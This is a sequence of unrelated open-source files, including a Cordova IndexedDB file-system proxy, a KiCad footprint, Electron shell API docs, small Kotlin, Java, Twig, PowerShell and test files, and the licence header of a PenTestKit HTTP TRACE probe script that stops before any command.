blob_ = new Blob([head, new Uint8Array(padding), data, tail],
{type: data.type});
}
// Set the blob we're writing on this file entry so we can recall it later.
fileEntry.file_.blob_ = blob_;
// NOTE(review): `data` is typically an ArrayBuffer here, which has no
// lastModifiedDate, so this usually stores null -- confirm intended.
fileEntry.file_.lastModifiedDate = data.lastModifiedDate || null;
fileEntry.file_.size = blob_.size;
// NOTE(review): Blob has no `name`/guaranteed `type` -- these may become
// undefined/'' after a write; verify downstream consumers tolerate that.
fileEntry.file_.name = blob_.name;
fileEntry.file_.type = blob_.type;
idb_.put(fileEntry, fileEntry.file_.storagePath, function() {
successCallback(data.byteLength);
}, errorCallback);
}, errorCallback, [fileName, null]);
};
exports.readAsText = function(successCallback, errorCallback, args) {
var fileName = args[0],
enc = args[1],
startPos = args[2],
endPos = args[3];
readAs('text', fileName, enc, startPos, endPos, successCallback, errorCallback);
};
exports.readAsDataURL = function(successCallback, errorCallback, args) {
var fileName = args[0],
startPos = args[1],
endPos = args[2];
readAs('dataURL', fileName, null, startPos, endPos, successCallback, errorCallback);
};
exports.readAsBinaryString = function(successCallback, errorCallback, args) {
var fileName = args[0],
startPos = args[1],
endPos = args[2];
readAs('binaryString', fileName, null, startPos, endPos, successCallback, errorCallback);
};
exports.readAsArrayBuffer = function(successCallback, errorCallback, args) {
var fileName = args[0],
startPos = args[1],
endPos = args[2];
readAs('arrayBuffer', fileName, null, startPos, endPos, successCallback, errorCallback);
};
exports.removeRecursively = exports.remove = function(successCallback, errorCallback, args) {
var fullPath = args[0];
// TODO: This doesn't protect against directories that have content in it.
// Should throw an error instead if the dirEntry is not empty.
idb_['delete'](fullPath, function() {
successCallback();
}, errorCallback);
};
// Look up (or create) the directory `path` (args[1]) relative to directory
// `fullPath` (args[0]); args[2] holds the W3C {create, exclusive} flags.
// Mirrors getFile above, with the file/directory roles swapped.
exports.getDirectory = function(successCallback, errorCallback, args) {
var fullPath = args[0];
var path = args[1];
var options = args[2];
// Create an absolute path if we were handed a relative one.
path = resolveToFullPath_(fullPath, path);
idb_.get(path.storagePath, function(folderEntry) {
if (!options) {
options = {};
}
if (options.create === true && options.exclusive === true && folderEntry) {
// If create and exclusive are both true, and the path already exists,
// getDirectory must fail.
if (errorCallback) {
errorCallback(FileError.INVALID_MODIFICATION_ERR);
}
} else if (options.create === true && !folderEntry) {
// If create is true, the path doesn't exist, and no other error occurs,
// getDirectory must create it as a zero-length file and return a corresponding
// MyDirectoryEntry.
var dirEntry = new DirectoryEntry(path.fileName, path.fullPath, new FileSystem(path.fsName, fs_.root));
idb_.put(dirEntry, path.storagePath, successCallback, errorCallback);
} else if (options.create === true && folderEntry) {
if (folderEntry.isDirectory) {
// IDB won't save methods, so we need re-create the MyDirectoryEntry.
successCallback(new DirectoryEntry(folderEntry.name, folderEntry.fullPath, folderEntry.fileSystem));
} else {
// Existing entry is a file: cannot be replaced by a directory.
if (errorCallback) {
errorCallback(FileError.INVALID_MODIFICATION_ERR);
}
}
} else if ((!options.create || options.create === false) && !folderEntry) {
// Handle root special. It should always exist.
if (path.fullPath === DIR_SEPARATOR) {
successCallback(fs_.root);
return;
}
// If create is not true and the path doesn't exist, getDirectory must fail.
if (errorCallback) {
errorCallback(FileError.NOT_FOUND_ERR);
}
} else if ((!options.create || options.create === false) && folderEntry &&
folderEntry.isFile) {
// If create is not true and the path exists, but is a file, getDirectory
// must fail.
if (errorCallback) {
errorCallback(FileError.INVALID_MODIFICATION_ERR);
}
} else {
// Otherwise, if no other error occurs, getDirectory must return a
// MyDirectoryEntry corresponding to path.
// IDB won't' save methods, so we need re-create MyDirectoryEntry.
successCallback(new DirectoryEntry(folderEntry.name, folderEntry.fullPath, folderEntry.fileSystem));
}
}, errorCallback);
};
exports.getParent = function(successCallback, errorCallback, args) {
var fullPath = args[0];
if (fullPath === DIR_SEPARATOR) {
successCallback(fs_.root);
return;
}
var pathArr = fullPath.split(DIR_SEPARATOR);
pathArr.pop();
var namesa = pathArr.pop();
var path = pathArr.join(DIR_SEPARATOR);
exports.getDirectory(successCallback, errorCallback, [path, namesa, {create: false}]);
};
exports.copyTo = function(successCallback, errorCallback, args) {
var srcPath = args[0];
var parentFullPath = args[1];
var name = args[2];
// Read src file
exports.getFile(function(srcFileEntry) {
// Create dest file
exports.getFile(function(dstFileEntry) {
exports.write(function() {
successCallback(dstFileEntry);
}, errorCallback, [dstFileEntry.file_.storagePath, srcFileEntry.file_.blob_, 0]);
}, errorCallback, [parentFullPath, name, {create: true}]);
}, errorCallback, [srcPath, null]);
};
exports.moveTo = function(successCallback, errorCallback, args) {
var srcPath = args[0];
//var parentFullPath = args[1];
//var name = args[2];
exports.copyTo(function (fileEntry) {
exports.remove(function () {
successCallback(fileEntry);
}, errorCallback, [srcPath]);
}, errorCallback, args);
};
// Resolve a file:/// (persistent/temporary) or application-origin URI at
// args[0] to a live Entry. Application URIs are fetched over XHR and copied
// into the persistent filesystem first.
exports.resolveLocalFileSystemURI = function(successCallback, errorCallback, args) {
var path = args[0];
// Ignore parameters
if (path.indexOf('?') !== -1) {
path = String(path).split("?")[0];
}
// support for encodeURI
if (/\%5/g.test(path)) {
path = decodeURI(path);
}
if (path.indexOf(pathsPrefix.dataDirectory) === 0) {
// Keep the leading '/' (hence length - 1), then try file first, dir second.
path = path.substring(pathsPrefix.dataDirectory.length - 1);
exports.requestFileSystem(function(fs) {
fs.root.getFile(path, {create: false}, successCallback, function() {
fs.root.getDirectory(path, {create: false}, successCallback, errorCallback);
});
}, errorCallback, [LocalFileSystem.PERSISTENT]);
} else if (path.indexOf(pathsPrefix.cacheDirectory) === 0) {
path = path.substring(pathsPrefix.cacheDirectory.length - 1);
exports.requestFileSystem(function(fs) {
fs.root.getFile(path, {create: false}, successCallback, function() {
fs.root.getDirectory(path, {create: false}, successCallback, errorCallback);
});
}, errorCallback, [LocalFileSystem.TEMPORARY]);
} else if (path.indexOf(pathsPrefix.applicationDirectory) === 0) {
path = path.substring(pathsPrefix.applicationDirectory.length);
// Fetch the packaged asset over HTTP and mirror it into the persistent fs.
var xhr = new XMLHttpRequest();
xhr.open("GET", path, true);
xhr.onreadystatechange = function () {
// Fires several times; only act once the response is complete and OK.
if (xhr.status === 200 && xhr.readyState === 4) {
exports.requestFileSystem(function(fs) {
fs.name = location.hostname;
fs.root.getFile(path, {create: true}, writeFile, errorCallback);
}, errorCallback, [LocalFileSystem.PERSISTENT]);
}
};
xhr.onerror = function () {
if (errorCallback) {
errorCallback(FileError.NOT_READABLE_ERR);
}
};
xhr.send();
} else {
if (errorCallback) {
errorCallback(FileError.NOT_FOUND_ERR);
}
}
// Write the XHR response body into the freshly created entry, then hand the
// entry to successCallback.
function writeFile(entry) {
entry.createWriter(function (fileWriter) {
fileWriter.onwriteend = function (evt) {
if (!evt.target.error) {
entry.filesystemName = location.hostname;
successCallback(entry);
}
};
fileWriter.onerror = function () {
if (errorCallback) {
errorCallback(FileError.NOT_READABLE_ERR);
}
};
fileWriter.write(new Blob([xhr.response]));
}, errorCallback);
}
};
// Hand the table of well-known directory URIs (application/data/cache)
// declared at the top of this module to the caller.
exports.requestAllPaths = function(successCallback) {
successCallback(pathsPrefix);
};
/*** Helpers ***/
/**
* Interface to wrap the native File interface.
*
* This interface is necessary for creating zero-length (empty) files,
* something the Filesystem API allows you to do. Unfortunately, File's
* constructor cannot be called directly, making it impossible to instantiate
* an empty File in JS.
*
* @param {Object} opts Initial values.
* @constructor
*/
function MyFile(opts) {
    // Private backing blob; exposed through the blob_ accessor below.
    var backingBlob = new Blob();
    this.size = opts.size || 0;
    this.name = opts.name || '';
    this.type = opts.type || '';
    this.lastModifiedDate = opts.lastModifiedDate || null;
    this.storagePath = opts.storagePath || '';
    // Keep size/name/type/lastModifiedDate in sync with whatever blob gets
    // assigned to this file.
    Object.defineProperty(this, 'blob_', {
        enumerable: true,
        get: function() {
            return backingBlob;
        },
        set: function(newBlob) {
            backingBlob = newBlob;
            this.size = newBlob.size;
            this.name = newBlob.name;
            this.type = newBlob.type;
            this.lastModifiedDate = newBlob.lastModifiedDate;
        }.bind(this)
    });
}
MyFile.prototype.constructor = MyFile;
// When saving an entry, the fullPath should always lead with a slash and never
// end with one (e.g. a directory). Also, resolve '.' and '..' to an absolute
// one. This method ensures path is legit!
// Normalize `path` (possibly relative to `cwdFullPath`) into an absolute,
// '/'-prefixed path with '.'/'..' segments collapsed and no trailing slash.
// Returns {storagePath, fullPath, fileName, fsName}.
function resolveToFullPath_(cwdFullPath, path) {
path = path || '';
var fullPath = path;
var prefix = '';
cwdFullPath = cwdFullPath || DIR_SEPARATOR;
// NOTE(review): FILESYSTEM_PREFIX is not defined anywhere in this closure;
// if cwdFullPath ever starts with a filesystem: prefix this branch would
// throw a ReferenceError unless a global of that name exists -- confirm.
if (cwdFullPath.indexOf(FILESYSTEM_PREFIX) === 0) {
prefix = cwdFullPath.substring(0, cwdFullPath.indexOf(DIR_SEPARATOR, FILESYSTEM_PREFIX.length));
cwdFullPath = cwdFullPath.substring(cwdFullPath.indexOf(DIR_SEPARATOR, FILESYSTEM_PREFIX.length));
}
var relativePath = path[0] !== DIR_SEPARATOR;
if (relativePath) {
fullPath = cwdFullPath;
if (cwdFullPath != DIR_SEPARATOR) {
fullPath += DIR_SEPARATOR + path;
} else {
fullPath += path;
}
}
// Adjust '..'s by removing parent directories when '..' flows in path.
// NOTE(review): this blanks only the immediately preceding segment, so
// consecutive '..' segments ('a/b/../..') are not fully resolved -- verify
// callers never pass such paths.
var parts = fullPath.split(DIR_SEPARATOR);
for (var i = 0; i < parts.length; ++i) {
var part = parts[i];
if (part == '..') {
parts[i - 1] = '';
parts[i] = '';
}
}
// Drop the blanked segments and rebuild the path.
fullPath = parts.filter(function(el) {
return el;
}).join(DIR_SEPARATOR);
// Add back in leading slash.
if (fullPath[0] !== DIR_SEPARATOR) {
fullPath = DIR_SEPARATOR + fullPath;
}
// Replace './' by current dir. ('./one/./two' -> one/two)
fullPath = fullPath.replace(/\.\//g, DIR_SEPARATOR);
// Replace '//' with '/'.
fullPath = fullPath.replace(/\/\//g, DIR_SEPARATOR);
// Replace '/.' with '/'.
fullPath = fullPath.replace(/\/\./g, DIR_SEPARATOR);
// Remove '/' if it appears on the end.
if (fullPath[fullPath.length - 1] == DIR_SEPARATOR &&
fullPath != DIR_SEPARATOR) {
fullPath = fullPath.substring(0, fullPath.length - 1);
}
return {
storagePath: prefix + fullPath,
fullPath: fullPath,
fileName: fullPath.split(DIR_SEPARATOR).pop(),
fsName: prefix.split(DIR_SEPARATOR).pop()
};
}
// Rebuild a live FileEntry from a structured clone loaded out of IndexedDB
// (IDB persists data properties but not methods/prototypes).
function fileEntryFromIdbEntry(fileEntry) {
    var rehydrated = new FileEntry(fileEntry.name, fileEntry.fullPath, fileEntry.fileSystem);
    rehydrated.file_ = fileEntry.file_;
    return rehydrated;
}
// Read the byte range [startPos, endPos) of the file at fullPath and deliver
// it to successCallback in the representation selected by `what`
// ('text', 'dataURL', 'arrayBuffer' or 'binaryString').
function readAs(what, fullPath, encoding, startPos, endPos, successCallback, errorCallback) {
    exports.getFile(function(fileEntry) {
        var reader = new FileReader();
        var slice = fileEntry.file_.blob_.slice(startPos, endPos);
        reader.onload = function(e) {
            successCallback(e.target.result);
        };
        reader.onerror = errorCallback;
        if (what === 'text') {
            reader.readAsText(slice, encoding);
        } else if (what === 'dataURL') {
            reader.readAsDataURL(slice);
        } else if (what === 'arrayBuffer') {
            reader.readAsArrayBuffer(slice);
        } else if (what === 'binaryString') {
            reader.readAsBinaryString(slice);
        }
    }, errorCallback, [fullPath, null]);
}
/*** Core logic to handle IDB operations ***/
// Open (and lazily create/upgrade) the IndexedDB database named dbName,
// then invoke successCallback with the success event.
idb_.open = function(dbName, successCallback, errorCallback) {
var self = this;
// TODO: FF 12.0a1 isn't liking a db name with : in it.
// NOTE(review): the nested /* */ below ends at the first '*/', so the call
// is effectively open(name) with no explicit version -- which still works,
// but the commented-out version argument was never restored.
var request = indexedDB.open(dbName.replace(':', '_')/*, 1 /*version*/);
request.onerror = errorCallback || onError;
request.onupgradeneeded = function(e) {
// First open was called or higher db version was used.
// console.log('onupgradeneeded: oldVersion:' + e.oldVersion,
// 'newVersion:' + e.newVersion);
self.db = e.target.result;
self.db.onerror = onError;
if (!self.db.objectStoreNames.contains(FILE_STORE_)) {
self.db.createObjectStore(FILE_STORE_/*,{keyPath: 'id', autoIncrement: true}*/);
}
};
request.onsuccess = function(e) {
self.db = e.target.result;
self.db.onerror = onError;
successCallback(e);
};
request.onblocked = errorCallback || onError;
};
// Close the database connection and drop the reference so later operations
// fail fast with INVALID_MODIFICATION_ERR.
idb_.close = function() {
this.db.close();
this.db = null;
};
// Fetch the entry stored under fullPath. Yields undefined (not an error)
// when nothing matches.
idb_.get = function(fullPath, successCallback, errorCallback) {
if (!this.db) {
if (errorCallback) {
errorCallback(FileError.INVALID_MODIFICATION_ERR);
}
return;
}
var tx = this.db.transaction([FILE_STORE_], 'readonly');
//var request = tx.objectStore(FILE_STORE_).get(fullPath);
// Range [fullPath, fullPath + '0'): get() returns the first key in range.
// NOTE(review): if the exact key is absent this can match a descendant
// such as fullPath + '/child' -- confirm this looseness is intended.
var range = IDBKeyRange.bound(fullPath, fullPath + DIR_OPEN_BOUND,
false, true);
var request = tx.objectStore(FILE_STORE_).get(range);
tx.onabort = errorCallback || onError;
tx.oncomplete = function(e) {
successCallback(request.result);
};
};
// Collect every entry stored under storagePath's subtree via a cursor, then
// filter down to the direct children of fullPath before calling back.
idb_.getAllEntries = function(fullPath, storagePath, successCallback, errorCallback) {
if (!this.db) {
if (errorCallback) {
errorCallback(FileError.INVALID_MODIFICATION_ERR);
}
return;
}
var results = [];
// Normalize away a trailing '/' so the range bounds line up.
if (storagePath[storagePath.length - 1] === DIR_SEPARATOR) {
storagePath = storagePath.substring(0, storagePath.length - 1);
}
// [storagePath + '/', storagePath + '0'): the whole subtree, descendants
// at any depth included.
var range = IDBKeyRange.bound(
storagePath + DIR_SEPARATOR, storagePath + DIR_OPEN_BOUND, false, true);
var tx = this.db.transaction([FILE_STORE_], 'readonly');
tx.onabort = errorCallback || onError;
tx.oncomplete = function(e) {
// Keep only direct children: compare path depth (number of '/' segments).
results = results.filter(function(val) {
var valPartsLen = val.fullPath.split(DIR_SEPARATOR).length;
var fullPathPartsLen = fullPath.split(DIR_SEPARATOR).length;
if (fullPath === DIR_SEPARATOR && valPartsLen < fullPathPartsLen + 1) {
// Hack to filter out entries in the root folder. This is inefficient
// because reading the entires of fs.root (e.g. '/') returns ALL
// results in the database, then filters out the entries not in '/'.
return val;
} else if (fullPath !== DIR_SEPARATOR &&
valPartsLen === fullPathPartsLen + 1) {
// If this a subfolder and entry is a direct child, include it in
// the results. Otherwise, it's not an entry of this folder.
return val;
}
});
successCallback(results);
};
var request = tx.objectStore(FILE_STORE_).openCursor(range);
request.onsuccess = function(e) {
var cursor = e.target.result;
if (cursor) {
var val = cursor.value;
// Rehydrate methods lost by IDB's structured clone.
results.push(val.isFile ? fileEntryFromIdbEntry(val) : new DirectoryEntry(val.name, val.fullPath, val.fileSystem));
cursor['continue']();
}
};
};
// Delete the entry at fullPath together with everything below it: the key
// range [fullPath, fullPath + '0') covers the entry and its whole subtree.
idb_['delete'] = function(fullPath, successCallback, errorCallback) {
if (!this.db) {
if (errorCallback) {
errorCallback(FileError.INVALID_MODIFICATION_ERR);
}
return;
}
var tx = this.db.transaction([FILE_STORE_], 'readwrite');
tx.oncomplete = successCallback;
tx.onabort = errorCallback || onError;
//var request = tx.objectStore(FILE_STORE_).delete(fullPath);
var range = IDBKeyRange.bound(
fullPath, fullPath + DIR_OPEN_BOUND, false, true);
tx.objectStore(FILE_STORE_)['delete'](range);
};
// Insert or overwrite `entry` under the key storagePath, then hand the
// (in-memory) entry back to successCallback once the transaction commits.
idb_.put = function(entry, storagePath, successCallback, errorCallback) {
if (!this.db) {
if (errorCallback) {
errorCallback(FileError.INVALID_MODIFICATION_ERR);
}
return;
}
var tx = this.db.transaction([FILE_STORE_], 'readwrite');
tx.onabort = errorCallback || onError;
tx.oncomplete = function(e) {
// TODO: Error is thrown if we pass the request event back instead.
successCallback(entry);
};
tx.objectStore(FILE_STORE_).put(entry, storagePath);
};
// Global error handler. Errors bubble from request, to transaction, to db.
// Fallback error logger. Errors bubble from request, to transaction, to db.
function onError(e) {
    var code = e.target.errorCode;
    if (code === 12) {
        console.log('Error - Attempt to open db with a lower version than the ' +
            'current one.');
    } else {
        console.log('errorCode: ' + code);
    }
    console.log(e, e.code, e.message);
}
// Clean up.
// TODO: Is there a place for this?
// global.addEventListener('beforeunload', function(e) {
// idb_.db && idb_.db.close();
// }, false);
})(module.exports, window);
require("cordova/exec/proxy").add("File", module.exports);
|
{
"pile_set_name": "Github"
}
|
(module PinSocket_2x11_P1.27mm_Vertical (layer F.Cu) (tedit 5A19A422)
(descr "Through hole straight socket strip, 2x11, 1.27mm pitch, double cols (from Kicad 4.0.7), script generated")
(tags "Through hole socket strip THT 2x11 1.27mm double row")
(fp_text reference REF** (at -0.635 -2.135) (layer F.SilkS)
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_text value PinSocket_2x11_P1.27mm_Vertical (at -0.635 14.835) (layer F.Fab)
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_line (start -2.16 -0.635) (end 0.1275 -0.635) (layer F.Fab) (width 0.1))
(fp_line (start 0.1275 -0.635) (end 0.89 0.1275) (layer F.Fab) (width 0.1))
(fp_line (start 0.89 0.1275) (end 0.89 13.335) (layer F.Fab) (width 0.1))
(fp_line (start 0.89 13.335) (end -2.16 13.335) (layer F.Fab) (width 0.1))
(fp_line (start -2.16 13.335) (end -2.16 -0.635) (layer F.Fab) (width 0.1))
(fp_line (start -2.22 -0.695) (end -1.57753 -0.695) (layer F.SilkS) (width 0.12))
(fp_line (start -0.96247 -0.695) (end -0.76 -0.695) (layer F.SilkS) (width 0.12))
(fp_line (start -2.22 -0.695) (end -2.22 13.395) (layer F.SilkS) (width 0.12))
(fp_line (start 0.30753 13.395) (end 0.95 13.395) (layer F.SilkS) (width 0.12))
(fp_line (start -2.22 13.395) (end -1.57753 13.395) (layer F.SilkS) (width 0.12))
(fp_line (start -0.96247 13.395) (end -0.30753 13.395) (layer F.SilkS) (width 0.12))
(fp_line (start 0.95 0.635) (end 0.95 13.395) (layer F.SilkS) (width 0.12))
(fp_line (start 0.76 0.635) (end 0.95 0.635) (layer F.SilkS) (width 0.12))
(fp_line (start 0.95 -0.76) (end 0.95 0) (layer F.SilkS) (width 0.12))
(fp_line (start 0 -0.76) (end 0.95 -0.76) (layer F.SilkS) (width 0.12))
(fp_line (start -2.67 -1.15) (end 1.38 -1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start 1.38 -1.15) (end 1.38 13.85) (layer F.CrtYd) (width 0.05))
(fp_line (start 1.38 13.85) (end -2.67 13.85) (layer F.CrtYd) (width 0.05))
(fp_line (start -2.67 13.85) (end -2.67 -1.15) (layer F.CrtYd) (width 0.05))
(pad 1 thru_hole rect (at 0 0) (size 1 1) (drill 0.7) (layers *.Cu *.Mask))
(pad 2 thru_hole oval (at -1.27 0) (size 1 1) (drill 0.7) (layers *.Cu *.Mask))
(pad 3 thru_hole oval (at 0 1.27) (size 1 1) (drill 0.7) (layers *.Cu *.Mask))
(pad 4 thru_hole oval (at -1.27 1.27) (size 1 1) (drill 0.7) (layers *.Cu *.Mask))
(pad 5 thru_hole oval (at 0 2.54) (size 1 1) (drill 0.7) (layers *.Cu *.Mask))
(pad 6 thru_hole oval (at -1.27 2.54) (size 1 1) (drill 0.7) (layers *.Cu *.Mask))
(pad 7 thru_hole oval (at 0 3.81) (size 1 1) (drill 0.7) (layers *.Cu *.Mask))
(pad 8 thru_hole oval (at -1.27 3.81) (size 1 1) (drill 0.7) (layers *.Cu *.Mask))
(pad 9 thru_hole oval (at 0 5.08) (size 1 1) (drill 0.7) (layers *.Cu *.Mask))
(pad 10 thru_hole oval (at -1.27 5.08) (size 1 1) (drill 0.7) (layers *.Cu *.Mask))
(pad 11 thru_hole oval (at 0 6.35) (size 1 1) (drill 0.7) (layers *.Cu *.Mask))
(pad 12 thru_hole oval (at -1.27 6.35) (size 1 1) (drill 0.7) (layers *.Cu *.Mask))
(pad 13 thru_hole oval (at 0 7.62) (size 1 1) (drill 0.7) (layers *.Cu *.Mask))
(pad 14 thru_hole oval (at -1.27 7.62) (size 1 1) (drill 0.7) (layers *.Cu *.Mask))
(pad 15 thru_hole oval (at 0 8.89) (size 1 1) (drill 0.7) (layers *.Cu *.Mask))
(pad 16 thru_hole oval (at -1.27 8.89) (size 1 1) (drill 0.7) (layers *.Cu *.Mask))
(pad 17 thru_hole oval (at 0 10.16) (size 1 1) (drill 0.7) (layers *.Cu *.Mask))
(pad 18 thru_hole oval (at -1.27 10.16) (size 1 1) (drill 0.7) (layers *.Cu *.Mask))
(pad 19 thru_hole oval (at 0 11.43) (size 1 1) (drill 0.7) (layers *.Cu *.Mask))
(pad 20 thru_hole oval (at -1.27 11.43) (size 1 1) (drill 0.7) (layers *.Cu *.Mask))
(pad 21 thru_hole oval (at 0 12.7) (size 1 1) (drill 0.7) (layers *.Cu *.Mask))
(pad 22 thru_hole oval (at -1.27 12.7) (size 1 1) (drill 0.7) (layers *.Cu *.Mask))
(fp_text user %R (at -0.635 6.35 90) (layer F.Fab)
(effects (font (size 1 1) (thickness 0.15)))
)
(model ${KISYS3DMOD}/Connector_PinSocket_1.27mm.3dshapes/PinSocket_2x11_P1.27mm_Vertical.wrl
(at (xyz 0 0 0))
(scale (xyz 1 1 1))
(rotate (xyz 0 0 0))
)
)
|
{
"pile_set_name": "Github"
}
|
/*
* This Source Code Form is subject to the terms of the Mozilla Public License,
* v. 2.0. If a copy of the MPL was not distributed with this file, You can
* obtain one at http://mozilla.org/MPL/2.0/. OpenMRS is also distributed under
* the terms of the Healthcare Disclaimer located at http://openmrs.org/license.
*
* Copyright (C) OpenMRS Inc. OpenMRS is a registered trademark and the OpenMRS
* graphic logo is a trademark of OpenMRS Inc.
*/
package org.openmrs.mobile.utilities
import android.content.Context
import androidx.appcompat.widget.AppCompatEditText
/**
 * [AppCompatEditText] that additionally carries a numeric range and a
 * display name. The class itself does not enforce the limits; callers read
 * [upperlimit]/[lowerlimit] and validate the entered value themselves.
 */
class RangeEditText(context: Context?) : AppCompatEditText(context!!) {
// Upper bound of the accepted value (null = no bound set).
var upperlimit: Double? = null
// Lower bound of the accepted value (null = no bound set).
var lowerlimit: Double? = null
// Human-readable field name, e.g. for validation messages.
var name: String? = null
}
|
{
"pile_set_name": "Github"
}
|
# shell
> Manage files and URLs using their default applications.
Process: [Main](../glossary.md#main-process), [Renderer](../glossary.md#renderer-process) (non-sandboxed only)
The `shell` module provides functions related to desktop integration.
An example of opening a URL in the user's default browser:
```javascript
const { shell } = require('electron')
shell.openExternal('https://github.com')
```
**Note:** While the `shell` module can be used in the renderer process, it will not function in a sandboxed renderer.
## Methods
The `shell` module has the following methods:
### `shell.showItemInFolder(fullPath)`
* `fullPath` String
Show the given file in a file manager. If possible, select the file.
### `shell.openPath(path)`
* `path` String
Returns `Promise<String>` - Resolves with a string containing the error message corresponding to the failure if a failure occurred, otherwise "".
Open the given file in the desktop's default manner.
### `shell.openExternal(url[, options])`
* `url` String - Max 2081 characters on Windows.
* `options` Object (optional)
* `activate` Boolean (optional) _macOS_ - `true` to bring the opened application to the foreground. The default is `true`.
* `workingDirectory` String (optional) _Windows_ - The working directory.
Returns `Promise<void>`
Open the given external protocol URL in the desktop's default manner. (For example, mailto: URLs in the user's default mail agent).
### `shell.moveItemToTrash(fullPath[, deleteOnFail])`
* `fullPath` String
* `deleteOnFail` Boolean (optional) - Whether or not to unilaterally remove the item if the Trash is disabled or unsupported on the volume. _macOS_
Returns `Boolean` - Whether the item was successfully moved to the trash or otherwise deleted.
Move the given file to trash and returns a boolean status for the operation.
### `shell.beep()`
Play the beep sound.
### `shell.writeShortcutLink(shortcutPath[, operation], options)` _Windows_
* `shortcutPath` String
* `operation` String (optional) - Default is `create`, can be one of following:
* `create` - Creates a new shortcut, overwriting if necessary.
* `update` - Updates specified properties only on an existing shortcut.
* `replace` - Overwrites an existing shortcut, fails if the shortcut doesn't
exist.
* `options` [ShortcutDetails](structures/shortcut-details.md)
Returns `Boolean` - Whether the shortcut was created successfully.
Creates or updates a shortcut link at `shortcutPath`.
### `shell.readShortcutLink(shortcutPath)` _Windows_
* `shortcutPath` String
Returns [`ShortcutDetails`](structures/shortcut-details.md)
Resolves the shortcut link at `shortcutPath`.
An exception will be thrown when any error happens.
|
{
"pile_set_name": "Github"
}
|
{# Emit one <script> tag per registered JS file. PHP-generated scripts
   ('.php' in the name) receive the common request parameters; static files
   are cache-busted with the build version. #}
{% for file in files %}
<script data-cfasync="false" type="text/javascript" src="js/{{ file.filename }}
{{- '.php' in file.filename ? get_common(file.params|merge({'v': version})) : '?v=' ~ version|url_encode }}"></script>
{% endfor %}
{# Inline bootstrap: register every file with the AJAX script handler and
   fire the onload hooks of files that declare one, once the DOM is ready. #}
<script data-cfasync="false" type="text/javascript">
// <![CDATA[
{{ code|raw }}
{% if files is not empty %}
AJAX.scriptHandler
{% for file in files %}
.add('{{ file.filename|escape_js_string }}', {{ file.has_onload ? 1 : 0 }})
{% endfor %}
;
$(function() {
{% for file in files %}
{% if file.has_onload %}
AJAX.fireOnload('{{ file.filename|escape_js_string }}');
{% endif %}
{% endfor %}
});
{% endif %}
// ]]>
</script>
|
{
"pile_set_name": "Github"
}
|
/*
* *********************************************************************** *
* project: org.matsim.*
* *********************************************************************** *
* *
* copyright : (C) 2019 by the members listed in the COPYING, *
* LICENSE and WARRANTY file. *
* email : info at matsim dot org *
* *
* *********************************************************************** *
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* See also COPYING, LICENSE and WARRANTY file *
* *
* *********************************************************************** *
*/
package org.matsim.contrib.dvrp.tracker;
import org.matsim.api.core.v01.network.Link;
import org.matsim.contrib.dvrp.fleet.DvrpVehicle;
/**
* @author Michal Maciejewski (michalm)
*/
public interface OnlineTrackerListener {
/** Shared no-op listener for trackers that do not need link-entry notifications. */
OnlineTrackerListener NO_LISTENER = (vehicle, link) -> {
};
/**
* Notifies that the next link was entered.
*
* @param vehicle the vehicle that entered the link
* @param nextLink the link that was just entered
*/
void vehicleEnteredNextLink(DvrpVehicle vehicle, Link nextLink);
}
|
{
"pile_set_name": "Github"
}
|
def test_base_os(host):
    """The provisioned image must be CentOS 7 (testinfra ``host`` fixture)."""
    info = host.system_info
    assert info.distribution == 'centos'
    assert info.release == '7'
|
{
"pile_set_name": "Github"
}
|
# Skip when the server supports TLSv1.3; these expectations target older TLS.
--source include/not_have_tlsv13.inc
# Parameters consumed by ../include/connection_ssl.inc below.
--let $INCREMENT=1
--let $USE_SOCKET=
--let $ERROR_IF_CHANNEL_UNSECURE=ER_SECURE_TRANSPORT_REQUIRED
--let $NO_SSL_ACCESS_DENIED_ERROR=2510
# Exercise the SSL connection checks once per authentication plugin.
--let $USER_AUTH_PLUGIN= 'mysql_native_password'
--source ../include/connection_ssl.inc
--let $USER_AUTH_PLUGIN= 'sha256_password'
--source ../include/connection_ssl.inc
--let $USER_AUTH_PLUGIN= 'caching_sha2_password'
--source ../include/connection_ssl.inc
|
{
"pile_set_name": "Github"
}
|
function Resolve-LabVMDiskPath {
<#
    .SYNOPSIS
        Resolves the specified VM name to its target VHD/VHDX path.
    .DESCRIPTION
        Builds the differencing-disk path from the host configuration,
        optionally nested under an environment folder. With -Parent the
        containing folder is returned instead of the disk file path.
#>
    param (
        ## VM/node name.
        [Parameter(Mandatory, ValueFromPipeline)]
        [ValidateNotNullOrEmpty()]
        [System.String] $Name,

        ## Disk image format (file extension).
        [Parameter()]
        [ValidateSet('VHD','VHDX')]
        [System.String] $Generation = 'VHDX',

        ## Configuration environment name
        [Parameter()]
        [AllowNull()]
        [System.String] $EnvironmentName,

        ## Return the parent/folder path
        [Parameter()]
        [System.Management.Automation.SwitchParameter] $Parent
    )
    process {

        $hostConfig = Get-ConfigurationData -Configuration Host;
        $basePath = $hostConfig.DifferencingVhdPath;

        ## Nest disks per environment unless the host configuration disables it.
        $useEnvironmentFolder = (-not $hostConfig.DisableVhdEnvironmentName) -and
                                (-not [System.String]::IsNullOrEmpty($EnvironmentName));
        if ($useEnvironmentFolder) {

            $basePath = Join-Path -Path $basePath -ChildPath $EnvironmentName;
        }

        if ($Parent) {

            return $basePath;
        }

        $diskFileName = '{0}.{1}' -f $Name, $Generation.ToLower();
        return (Join-Path -Path $basePath -ChildPath $diskFileName);

    } #end process
} #end function
|
{
"pile_set_name": "Github"
}
|
#!/bin/bash
# This file is part of PenTestKit
# Copyright (C) 2017-2018 @maldevel
# https://github.com/maldevel/PenTestKit
#
# PenTestKit - Useful tools for Penetration Testing.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# For more see the file 'LICENSE' for copying permission.
# Send an HTTP TRACE request to probe whether the target has the TRACE
# method enabled (Cross-Site Tracing exposure).
#
# Usage:
#   $0 <target-url>              # direct request
